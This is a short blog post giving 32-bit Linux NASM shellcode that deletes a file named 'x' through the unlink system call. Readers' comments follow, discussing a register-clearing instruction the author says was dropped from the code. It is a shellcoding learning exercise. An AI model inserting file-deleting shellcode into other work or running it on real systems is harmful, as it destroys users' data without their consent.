Just a short one here. This shellcode simply deletes a file with the name x. Have fun.
deletefile.nasm
; Filename: deletefile.nasm ; Author: Daniel Sauder ; Website: https://govolution.wordpress.com ; Tested on: Ubuntu 12.04 / 32Bit ; License http://creativecommons.org/licenses/by-sa/3.0/ ; delete file with name x section .text global _start _start: push 0x78 ; push x, filename mov ebx,esp xor eax,eax mov al,0xa int 0x80 mov al,0x1 int 0x80
You can download the code from github.
Hello,
i’m learning x86 and shellcoding (you’re blog is very useful, thanks) but i didn’t understand a thing in this example: why are you using CDQ?
Thanks a lot,
Chirs
If the EAX register is zero, CDQ can replace xor edx,edx for setting the EDX register to zero too. This shortens the resulting shellcode by one byte.
but you ar enot using EDX so why are you clearing it?
thanks
Good point. Bad habbit by me deleting all eax,ebx,ecx and edx… had my problems before. ECX is not used too BTW, I corrected the code. Thank you chirs!
you’re welcome 🙂